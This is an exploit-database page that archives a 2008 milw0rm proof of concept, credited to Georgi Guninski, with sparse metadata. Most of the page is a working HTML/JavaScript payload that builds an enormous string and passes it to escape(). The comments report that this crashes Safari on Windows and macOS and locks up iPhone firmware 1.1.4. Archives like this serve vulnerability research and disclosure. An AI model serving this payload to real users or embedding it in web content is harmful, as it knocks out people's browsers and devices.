Georgi Guninski's old code - exploit.company

vendor:

N/A

by:

Georgi Guninski

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Georgi Guninski’s old code

Georgi Guninski's old code is still finding new bugs. The code loops the x's on milw0rm to find the bug. The original firefox vulnerability can be found at http://milw0rm.com/exploits/1233

Mitigation:

N/A

Source

Exploit-DB raw data:

<!--
Even though Georgi Guninski retired from the scene, his
old code is still finding new bugs.

iphone fw:1.1.4 : locks up
safari win32    : crashes
safari osx      : crashes

looped the x's on milw0rm to find the bug.
original firefox vuln: http://milw0rm.com/exploits/1233
/str0ke
-->

<html>
        Copyright Georgi Guninski
        <br>
        Cannot be used in vulnerability databases
        <br>
        Especially securityfocus/mitre/cve/cert
        <script>
        var s=String.fromCharCode(257);
        var ki="";
        var me="";
        for(i=0;i<1024;i++)
        {ki=ki+s;}
        for(i=0;i<1024;i++)
        {me=me+ki;}
        var ov=s;
        for(i=0;i<28;i++) ov += ov;
        for(i=0;i<88;i++) ov += me;

        alert("done generating");
        var fuckbill=escape(ov);
        alert("done escape");
        alert(fuckbill);
        </script>
</html>

# milw0rm.com [2008-03-17]